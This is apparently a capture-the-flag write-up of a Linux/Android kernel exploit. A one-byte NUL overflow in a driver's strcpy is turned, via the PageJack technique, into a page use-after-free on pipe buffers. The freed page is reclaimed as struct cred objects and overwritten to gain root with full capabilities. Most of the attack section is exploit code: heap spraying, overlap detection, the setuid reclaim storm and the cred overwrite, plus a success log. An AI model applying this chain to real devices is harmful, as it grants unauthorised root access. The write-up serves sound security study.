TL;DR

A single off-by-one NUL byte in an Android kernel driver is leveraged into a page-level UAF and then into root via a struct cred overwrite (PageJack). No infoleak or kernel address is needed. Validated on the local QEMU image and ported to a Corellium device.

Target : Linux 5.15.41 arm64, /dev/kern-net
Local  : QEMU, nokaslr, uid mhl=1000
Device : Corellium (Android ranchu), KASLR on, SELinux enforcing, uid shell=2000
Flag   : MHL{big_things_have_small_beginnings}

Vulnerability

The driver’s LOAD_MODEL_DATA ioctl copies a fixed 128-byte structure from userland into a kernel buffer, then strcpys the description field:

struct model_metadata {        // sizeof == 128
    uint32_t framework_type;   // 0x00
    uint16_t model_version;    // 0x04
    uint16_t precision_bits;   // 0x06
    uint32_t input_shape[3];   // 0x08
    uint32_t output_size;      // 0x14
    uint64_t weight_checksum;  // 0x18
    char     model_desc[96];   // 0x20 .. 0x80
};
mdata = kmalloc(128, GFP_KERNEL_ACCOUNT);   // -> kmalloc-cg-128
strcpy(mdata->model_desc, user->model_desc);

model_desc is 96 bytes and ends exactly at offset 128. Supplying 96 non-NUL characters makes strcpy write the 96 bytes plus a terminating \0 at offset 128, a single NUL one byte past the object, onto byte 0 of the next cg-128 slot. The _ACCOUNT flag routes the allocation into the accounted kmalloc-cg-* caches.
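
The overflow can be reproduced in userland without touching the driver. The sketch below mirrors the structure above, models two adjacent 128-byte slots as one flat buffer, and replays a strcpy-style copy by hand so the out-of-bounds write stays inside memory the program owns. terminator_offset is a hypothetical helper name, not part of the driver or the exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

struct model_metadata {            /* same layout as the driver's structure */
    uint32_t framework_type;
    uint16_t model_version;
    uint16_t precision_bits;
    uint32_t input_shape[3];
    uint32_t output_size;
    uint64_t weight_checksum;
    char     model_desc[96];
};

static_assert(sizeof(struct model_metadata) == 128, "fills one 128-byte slot");
static_assert(offsetof(struct model_metadata, model_desc) == 0x20, "desc at 0x20");

/* Returns the offset, relative to the start of the object, at which a
 * strcpy-style copy of `desc` into model_desc writes its terminating NUL.
 * Hypothetical helper: slots[] stands in for two neighbouring slab slots. */
static size_t terminator_offset(const char *desc)
{
    unsigned char slots[2 * 128];
    size_t i = offsetof(struct model_metadata, model_desc);

    memset(slots, 0xAA, sizeof(slots));
    for (;;) {
        assert(i < sizeof(slots));         /* stay inside the model buffer */
        slots[i] = (unsigned char)*desc;   /* copy, terminator included */
        if (*desc == '\0')
            break;
        desc++;
        i++;
    }
    return i;
}
```

With 96 non-NUL characters the terminator lands at offset 128, which is byte 0 of the second slot; any shorter string keeps it inside the object.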

Relevant kernel configuration:

  • SLAB_FREELIST_RANDOM and SLAB_FREELIST_HARDENED enabled (randomized object order, obfuscated freelist pointers).
  • VMAP_STACK enabled (kernel stacks are vmalloc’d).
  • INIT_ON_ALLOC / INIT_ON_FREE disabled.
  • KASLR enabled but irrelevant: the exploit needs no infoleak.
  • System V IPC disabled on Android (msgget returns ENOSYS), which rules out the classic msg_msg route.

A single NUL at byte 0 of a neighbouring object is too weak to corrupt anything useful inside cg-128 itself (msg_msg, the usual candidate, is unavailable here anyway), so we target a page instead of an object.

Target object: cross-page onto a pipe_buffer array

A resized pipe is backed by an array of pipe_buffer structs:

struct pipe_buffer {           // sizeof = 40 B
    struct page *page;         // offset 0
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

After F_SETPIPE_SZ(2*PAGE) the array is 2 * 40 = 80 bytes and lands in kmalloc-cg-96. Separately, the first write into the pipe allocates a dedicated 4 KiB data page (alloc_page, unmovable); pipe_buffer[0].page holds the only reference to that page.

A cg-128 slab page holds 4096 / 128 = 32 objects. The off-by-one NUL lands at offset +128 of the mdata object, i.e. byte 0 of the next object. For objects 0..30 that next object is in the same page (same cache, useless). For object 31 (offset 0xf80), model_desc ends at 0xf80 + 0x20 + 96 = 0x1000, byte 0 of the neighbouring page. A slab page belongs to a single cache, but two pages of different caches can be physically adjacent: the buddy allocator can place a cg-128 page right before a cg-96 page. We therefore groom so that a cg-128 page whose mdata is the last object is physically followed by a pipe_buffer array page. The NUL then hits byte 0 of that page, the LSB of pipe_buffer[0].page.
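
The slot arithmetic is easy to check mechanically. This is a minimal sketch using the sizes quoted above (4 KiB page, 128-byte objects); the helper names are illustrative only.

```c
#include <assert.h>
#include <stddef.h>

enum { PAGE_SZ = 4096, OBJ_SZ = 128, OBJS_PER_PAGE = PAGE_SZ / OBJ_SZ };

/* Offset, from the start of the slab page, of the stray NUL written by the
 * mdata object at index `idx` (0..31). A result equal to PAGE_SZ means
 * byte 0 of the physically following page. */
static size_t nul_offset_in_page(unsigned idx)
{
    assert(idx < OBJS_PER_PAGE);
    return (size_t)idx * OBJ_SZ + OBJ_SZ;
}

/* True only for the last object of the page. */
static int nul_crosses_page(unsigned idx)
{
    return nul_offset_in_page(idx) == PAGE_SZ;
}
```

Only index 31 crosses the boundary, so on average one poison attempt in 32 can reach a neighbouring page at all, which is one reason the poisoning is repeated in bulk.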

[Figure: off-by-one NUL in gdb: 96 ‘A’ then the NUL on the next object]

[Figure: cross-page NUL]

PageJack primitive

The kernel keeps a struct page descriptor for every physical page in a flat array (vmemmap):

PFN N  ->  vmemmap[N]  @ vmemmap_base + N * 0x40

Since sizeof(struct page) == 0x40, every valid struct page * has one of {0x00, 0x40, 0x80, 0xC0} as its low byte. Clearing that low byte to 0x00 (ptr &= ~0xff) rounds the pointer down to a 0x100 boundary, i.e. pfn &= ~3:

original LSB   net shift   target
0x00            0          no-op
0x40           -0x40       PFN - 1
0x80           -0x80       PFN - 2
0xC0           -0xC0       PFN - 3

In three cases out of four, pipe_buffer.page is shifted onto a different struct page, describing a different physical page. With a dense pipe spray those pages have consecutive PFNs, so the shifted pointer lands on a neighbouring pipe’s data page. Two pipes (call them C and V) now reference the same page P, and P’s refcount is still 1: the NUL rewrote a pointer, it never called get_page.
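
The shift can be worked through in a few lines. The sketch assumes a vmemmap base aligned to 0x100; the constant used here is a made-up value for illustration, not an address taken from the target, and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define STRUCT_PAGE_SIZE 0x40ULL
/* Hypothetical vmemmap base, for illustration only; assumed 0x100-aligned. */
#define VMEMMAP_BASE 0xfffffc0000000000ULL

static uint64_t pfn_to_page(uint64_t pfn)
{
    return VMEMMAP_BASE + pfn * STRUCT_PAGE_SIZE;
}

static uint64_t page_to_pfn(uint64_t page)
{
    return (page - VMEMMAP_BASE) / STRUCT_PAGE_SIZE;
}

/* PFN described by a struct page pointer after its low byte is zeroed. */
static uint64_t pfn_after_nul(uint64_t pfn)
{
    uint64_t ptr = pfn_to_page(pfn);

    ptr &= ~0xffULL;            /* the off-by-one NUL on the pointer's LSB */
    return page_to_pfn(ptr);
}
```

For any PFN the result equals pfn & ~3, so the corrupted pipe ends up 0 to 3 pages below its original data page.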

[Figure: PageJack]

The pipe write primitive

Each pipe is given a full-page marker: a 4 KiB write where every 4-byte word is the pipe index. Reading a pipe returns the marker of whatever page its pipe_buffer[0].page currently points at, which makes the overlap detectable entirely in userland.

To write into the dangling page later, the exploit uses tmp_page. When a pipe buffer is fully drained, anon_pipe_buf_release caches its page into pipe->tmp_page if page_count(page) == 1 (true for a slab page) instead of freeing it. The next write() reuses tmp_page as a fresh buffer at offset 0 and copies into the page. Note that the overlap detection (Step 3) reads 4 bytes from pipe C, leaving its buffer at offset = 4: the read view is therefore shifted by 4 bytes from the physical page, while the tmp_page write restarts at physical offset 0, exactly where the slab objects begin (0, 192, 384, …).
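
The marker and the 4-byte view shift can be observed on an ordinary, uncorrupted pipe. The following sketch assumes Linux (F_SETPIPE_SZ and FIONREAD on a pipe); marker_roundtrip is a hypothetical name and the function touches nothing kernel-specific beyond the pipe itself.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE                /* for F_SETPIPE_SZ */
#endif
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <unistd.h>

#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ 1031          /* Linux value, in case headers hide it */
#endif
#define PG 4096

/* Writes a full-page marker into a fresh pipe, reads one 4-byte word back
 * and stores the number of bytes still queued in *remaining.
 * Returns the marker that was read, or -1 on failure. */
static int marker_roundtrip(int index, int *remaining)
{
    static int32_t pg[PG / 4];
    int fds[2];
    int32_t v = -1;

    if (pipe(fds) != 0)
        return -1;
    fcntl(fds[1], F_SETPIPE_SZ, 2 * PG);        /* best effort */
    for (int k = 0; k < PG / 4; k++)
        pg[k] = index;                          /* every word = pipe index */
    if (write(fds[1], pg, PG) != PG || read(fds[0], &v, 4) != 4)
        v = -1;
    if (ioctl(fds[0], FIONREAD, remaining) != 0)
        *remaining = -1;
    close(fds[0]);
    close(fds[1]);
    return v;
}
```

After the 4-byte read, 4092 bytes remain queued: the pipe's read cursor sits 4 bytes into the page, which is the shift the later rebuild has to undo.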

cred_jar and the buddy allocator

struct cred is allocated from a dedicated cred_jar cache. Slab caches are isolated at the slab layer but share the same buddy allocator, so a page returned to buddy by a cg-* cache can be reissued to cred_jar on its next refill.

struct cred on Linux 5.15 arm64 (verified at the gdb stub):

0x00  atomic_t usage        (4 bytes, NOT atomic_long here)
0x04  kuid_t uid
0x08  kgid_t gid
0x0c  suid    0x10 sgid
0x14  euid    0x18 egid
0x1c  fsuid   0x20 fsgid
0x24  securebits
0x28  cap_inheritable   0x30 cap_permitted
0x38  cap_effective     0x40 cap_bset    0x48 cap_ambient

cred_jar geometry: order-0, object size 192, so a 4 KiB page hosts 21 cred slots, with cpu_partial = 30, min_partial = 5.
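
The offsets and the slot count can be restated as compile-time checks. This is a sketch that mirrors only the leading fields listed above, with each capability set modelled as two 32-bit words; struct cred_prefix and creds_per_page are illustrative names, not kernel definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative mirror of the first 0x50 bytes of struct cred as listed. */
struct cred_prefix {
    uint32_t usage;
    uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
    uint32_t securebits;
    uint32_t cap_inheritable[2];
    uint32_t cap_permitted[2];
    uint32_t cap_effective[2];
    uint32_t cap_bset[2];
    uint32_t cap_ambient[2];
};

static_assert(offsetof(struct cred_prefix, uid) == 0x04, "uid");
static_assert(offsetof(struct cred_prefix, fsgid) == 0x20, "fsgid");
static_assert(offsetof(struct cred_prefix, securebits) == 0x24, "securebits");
static_assert(offsetof(struct cred_prefix, cap_inheritable) == 0x28, "inh");
static_assert(offsetof(struct cred_prefix, cap_effective) == 0x38, "eff");
static_assert(offsetof(struct cred_prefix, cap_ambient) == 0x48, "ambient");

/* Number of whole slab objects that fit in one page. */
static unsigned creds_per_page(unsigned page_size, unsigned object_size)
{
    return page_size / object_size;
}
```

With a 4096-byte page and 192-byte objects this gives 21 slots, hence 21 * 8 = 168 id words per fully populated page.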

Important Android detail: setting uid 0 is not enough. Without CAP_DAC_OVERRIDE in cap_effective, opening the root-owned flag returns EACCES. The overwrite must also fill the capability sets.

Reclaiming the page: the setuid storm

The textbook reclaim (a setuid loop to drain the freelist, then fork) is unreliable on this target, for two measured reasons:

  1. cred_jar keeps a reservoir (cpu_partial = 30, min_partial = 5), so a cred allocation almost always finds a free slot and does not force a fresh slab onto P. /proc/slabinfo cannot observe the per-cpu freelist, so the drain target is not observable.
  2. fork/clone does not help: besides the cred it performs zero-filled order-0 allocations (COW page tables for fork, faulted stack pages for clone) that consume the pcp-hot page P and zero it. Combined with the reservoir, the cred lands in a free slot elsewhere while P is taken by one of those zeroing allocations. Waking workers by writing into a pipe fails for the same reason: the write allocates a pipe data page that grabs P.

The fix is a storm of pure cred allocations with no parasitic allocation in the post-free window:

  1. fork 256 helpers before the spray, so they do not inherit the spray pipe fds (their stacks and page tables are allocated well before the UAF). Each helper pins to CPU 0 and blocks on a control pipe.
  2. After close(V), wake them by closing the control pipe’s write end. The blocked read returns EOF, which allocates nothing.
  3. Each helper calls setuid(getuid()). That is prepare_creds, a pure cred allocation with no preceding stack or page-table allocation. In volume the storm crosses the slab boundary, a fresh slab is born on P, and fills with live creds. We observe P full: 21 cred objects, 8 id fields each = 168 words equal to our uid.
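
The helper pattern from the three steps above can be sketched as follows. This is an assumption-laden illustration rather than the exploit's own code: run_setuid_storm is a hypothetical name, the CPU pinning done by the real helpers is left out to keep the block short, and the parent waits for the helpers to exit, whereas in the exploit they stay alive for the final stage.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_HELPERS 256

/* Forks `count` helpers that block on a control pipe, wakes them all with
 * an EOF, and returns how many completed setuid(getuid()) successfully. */
static int run_setuid_storm(int count)
{
    pid_t pids[MAX_HELPERS];
    int ctl[2], started = 0, ok = 0;

    assert(count >= 0 && count <= MAX_HELPERS);
    if (pipe(ctl) != 0)
        return -1;

    for (int i = 0; i < count; i++) {
        pid_t pid = fork();
        if (pid < 0)
            break;
        if (pid == 0) {
            char c;
            close(ctl[1]);        /* drop our write end or EOF never comes */
            while (read(ctl[0], &c, 1) > 0)
                ;                 /* block until the parent closes its end */
            _exit(setuid(getuid()) == 0 ? 0 : 1);   /* prepare_creds path */
        }
        pids[started++] = pid;
    }

    close(ctl[1]);                /* wake-up: EOF, no write into the pipe */
    close(ctl[0]);
    for (int i = 0; i < started; i++) {
        int status;
        if (waitpid(pids[i], &status, 0) == pids[i] &&
            WIFEXITED(status) && WEXITSTATUS(status) == 0)
            ok++;
    }
    return ok;
}
```

Each child must close its inherited write end before reading; otherwise the pipe still has a writer and the blocking read never returns EOF.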

[Figure: free and reclaim]

Exploitation

The exploit is a chain of small functions:

int main(void) {
    setup();                              // open device, pipes, rlimit, shared claim flag
    fork_helpers();                       // 256 setuid helpers, BEFORE the spray
    pin_cpu0();
    int n = spray_pipes();                // pipe_buffer arrays + a marked page each
    punch_holes(n);                       // free every other pipe
    int C, V;
    if (!pagejack(n, &C, &V)) return 1;   // poison until an alias is found
    page_uaf(V);                          // close(V): put_page(P) 1 -> 0
    char *page = calloc(1, PG);
    int hit = reclaim_cred_jar(C, page);  // setuid storm, then read P back
    if (!hit) { pause(); return 1; }
    overwrite_creds(C, page);             // patch every cred on P (uid 0 + caps)
    win();                                // wake helpers; a rooted one prints the flag
    pause();                              // never close pipe C (no double put_page on P)
}

setup() raises RLIMIT_NOFILE (each pipe uses two fds) and pin_cpu0() pins to CPU 0 (per-cpu slab/pcp locality). The rest is detailed below.
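
A minimal sketch of the descriptor-limit part of setup(), assuming it simply lifts the soft limit to the hard limit; raise_nofile and fds_for_pipes are hypothetical names and the real setup() may differ.

```c
#include <assert.h>
#include <sys/resource.h>

/* File descriptors consumed by `pipes` pipes (read end + write end). */
static unsigned long fds_for_pipes(unsigned long pipes)
{
    return 2 * pipes;
}

/* Raises the soft RLIMIT_NOFILE to the hard limit.
 * Returns the new soft limit, or 0 on failure. */
static rlim_t raise_nofile(void)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NOFILE, &rl) != 0)
        return 0;
    rl.rlim_cur = rl.rlim_max;
    if (setrlimit(RLIMIT_NOFILE, &rl) != 0)
        return 0;
    return rl.rlim_cur;
}
```

A 4096-pipe spray needs 8192 descriptors plus the device, control and result pipes, so the spray size has to fit under whatever raise_nofile() returns.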

Step 1: spray_pipes() (pipe arrays + full-page markers)

for (n = 0; n < 4096; n++) {
    pipe(pp[n]);
    fcntl(pp[n][1], F_SETPIPE_SZ, 2*PG);
    for (k = 0; k < PG/4; k++) ((int*)pg)[k] = n;   // marker = index
    write(pp[n][1], pg, PG);
}

Step 2: punch_holes() (checkerboard)

// close every even-indexed pipe and mark both ends as gone
for (i = 0; i < n; i += 2) { close(pp[i][0]); close(pp[i][1]); pp[i][0] = pp[i][1] = -1; }

Freeing one in two keeps every freed page bordered by survivors, so an mdata landing at the end of its slab page overflows into a pipe_buffer page.

Step 3: pagejack() (poison and locate the overlap)

while (np < 3072 && C < 0) {
    for (i = 0; i < 128; i++) knet_poison();           // mdata, NUL at +128
    np += 128;
    for (i = 1; i < n; i += 2) {                        // userland detection
        int v = -1;
        // a foreign marker must be a valid, odd (surviving), still-open pipe index
        if (read(pp[i][0], &v, 4) == 4 && v != i &&
            v >= 0 && v < n && (v & 1) && pp[v][0] >= 0) {
            C = i; V = v; break;                        // C reads V's marker
        }
    }
}

C is the corrupted pipe (its .page was shifted onto V’s page P); V is the legitimate owner. The partial read leaves the buffer alive, so P is not released.

Step 4: page_uaf() (free the shared page)

close(pp[V][0]); close(pp[V][1]);   // put_page(P): refcount 1 -> 0

P returns to buddy while pipe C still points at it: page-level UAF.

Step 5: reclaim_cred_jar() (the setuid storm)

close(ctl[1]);        // EOF wakes the 256 pre-forked helpers
usleep(150*1000);     // each helper: setuid(getuid()) -> fresh cred_jar slab on P
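
The "P is a cred page" check reported in the log amounts to counting 32-bit words equal to our uid in the page as seen through pipe C. The sketch below replays that count on a synthetic page; both helper names are hypothetical, the fake page holds only a usage counter and the eight id fields per slot, and how the exploit actually obtains the view is not shown here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PG        4096
#define CRED_SLOT 192

/* Counts the aligned 32-bit words in `view` that are equal to `uid`. */
static int count_uid_words(const unsigned char *view, size_t len, uint32_t uid)
{
    int hits = 0;

    for (size_t off = 0; off + 4 <= len; off += 4) {
        uint32_t w;
        memcpy(&w, view + off, 4);
        hits += (w == uid);
    }
    return hits;
}

/* Synthetic physical page: one cred per 192-byte slot, usage = 1 and the
 * eight id fields (uid..fsgid) set to `uid`; everything else is zero. */
static void fake_cred_page(unsigned char *page, uint32_t uid)
{
    const uint32_t one = 1;

    memset(page, 0, PG);
    for (size_t base = 0; base + 176 <= PG; base += CRED_SLOT) {
        memcpy(page + base, &one, 4);
        for (size_t f = 0; f < 8; f++)
            memcpy(page + base + 4 + 4 * f, &uid, 4);
    }
}
```

Because the read view starts 4 bytes into the page, the scan runs over page + 4; the shift is a multiple of 4, so the id fields stay word-aligned and a full page yields 168 hits.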

Step 6: overwrite_creds() (read P and overwrite every cred)

// drain pipe C: its buffer is released and P is cached as tmp_page
// (assumes pp[C][0] is O_NONBLOCK; otherwise the read on the emptied pipe blocks)
while ((r = read(pp[C][0], t+pos, PG-pos)) > 0) pos += r;
// rebuild the page (preserve each cred's kernel pointers), patch every cred:
for (m = 4; m < PG; m++) wb[m] = t[m-4];                    // read view is +4
for (base = 0; base+176 <= PG; base += 192) {
    *(int*)(wb+base) = 0x4000;          // usage (large, never 0)
    memset(wb+base+0x04, 0, 0x20);      // uid..fsgid = 0
    memset(wb+base+0x28, 0xff, 0x20);   // caps inherit/perm/eff/bset = full
}
write(pp[C][1], wb, PG);                // tmp_page == P -> rewrite the page

[Figure: cred overwrite]

Step 7: win() (read the flag once)

close(ctl2[1]);   // second EOF: any helper whose live cred is on P is now root

Each rooted helper (uid 0 + full caps) can open /data/vendor/secret/flag.txt, but only the first one reports: it claims a shared flag with __sync_bool_compare_and_swap(claimed, 0, 1) and writes the flag back to the parent through a result pipe, so the flag is printed exactly once. The parent must not exit: closing pipe C would call put_page on a page now owned by cred_jar and oops the kernel.
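
The report-once logic can be illustrated with a shared anonymous mapping and the same compare-and-swap builtin. This is a sketch under assumptions: count_claimers is a hypothetical name, every child races for the flag (in the exploit only rooted helpers would), and the winner signals through its exit status instead of a result pipe.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE                /* for MAP_ANONYMOUS under strict modes */
#endif
#include <assert.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_CLAIMERS 64

/* Forks `n` children that race to claim a shared flag with a CAS.
 * Returns the number of children that won the claim. */
static int count_claimers(int n)
{
    pid_t pids[MAX_CLAIMERS];
    int started = 0, winners = 0;
    int *claimed;

    assert(n >= 0 && n <= MAX_CLAIMERS);
    claimed = mmap(NULL, sizeof(*claimed), PROT_READ | PROT_WRITE,
                   MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (claimed == MAP_FAILED)
        return -1;
    *claimed = 0;

    for (int i = 0; i < n; i++) {
        pid_t pid = fork();
        if (pid < 0)
            break;
        if (pid == 0)       /* exit 0 only if this child flipped 0 -> 1 */
            _exit(__sync_bool_compare_and_swap(claimed, 0, 1) ? 0 : 1);
        pids[started++] = pid;
    }
    for (int i = 0; i < started; i++) {
        int status;
        if (waitpid(pids[i], &status, 0) == pids[i] &&
            WIFEXITED(status) && WEXITSTATUS(status) == 0)
            winners++;
    }
    munmap(claimed, sizeof(*claimed));
    return winners;
}
```

The mapping has to be MAP_SHARED and created before the fork; a private mapping would give every child its own copy of the flag and every child would win.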

[+] /dev/kern-net opened
[+] 256 setuid helpers pre-forked
[+] sprayed 4096 pipes
[+] checkerboard holes punched
[+] PageJack: pipe 3879 aliases pipe 3877's page P
[+] page UAF: P freed, pipe C dangling
[+] cred_jar reclaim: P is a cred page (168 uid fields)
[+] every cred on P overwritten (uid 0 + full caps)
[+] ROOT  FLAG = MHL{big_things_have_small_beginnings}

Tuning rationale

Parameter        Value                Reason
model_desc       96 ‘A’               Forces strcpy to write the NUL at offset 128, byte 0 of the neighbour.
Vulnerable slot  last of its page     Only object 31 sends the NUL across the page boundary into a different cache.
Free step        1 in 2               Keeps freed pages bordered by survivors so overflows hit a pipe_buffer.
OOB byte         0x00                 Keeps struct page * aligned to 0x40; pfn &= ~3 lands on a neighbour.
Helpers          256, pre-forked      Pure setuid cred allocations with no zeroing alloc to steal P.
Wake             close (EOF)          Writing to a pipe would allocate a page that grabs P.
usage            0x4000               Large and non-zero, so the patched cred is never freed.
Overwrite        whole page + caps    Patches all 21 creds (any may be live) and adds CAP_DAC_OVERRIDE.
Closing pipe C   never                Releasing it would put_page a cred_jar page.

References

  • PageJack, Black Hat USA 2024 by Qian: page-level UAF technique.
  • Reviving exploits against cred_struct, willsroot: https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html
  • LACTF 2025 “messenger” writeup (same PageJack + cred_jar technique on a 3-byte OOB), kiperz.dev.
  • corCTF 2025 “corphone” (Android pipe page-UAF to PTE hijack / SELinux off), u1f383.github.io.